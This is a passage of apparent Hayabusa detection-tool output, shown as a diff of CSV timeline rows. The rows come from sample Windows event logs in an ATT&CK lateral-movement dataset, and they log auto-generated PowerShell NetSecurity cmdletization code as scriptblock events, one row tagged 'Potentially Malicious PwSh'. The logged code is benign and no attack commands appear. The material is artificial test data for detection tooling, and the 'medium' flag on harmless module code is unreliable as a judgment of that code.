$__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewP",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 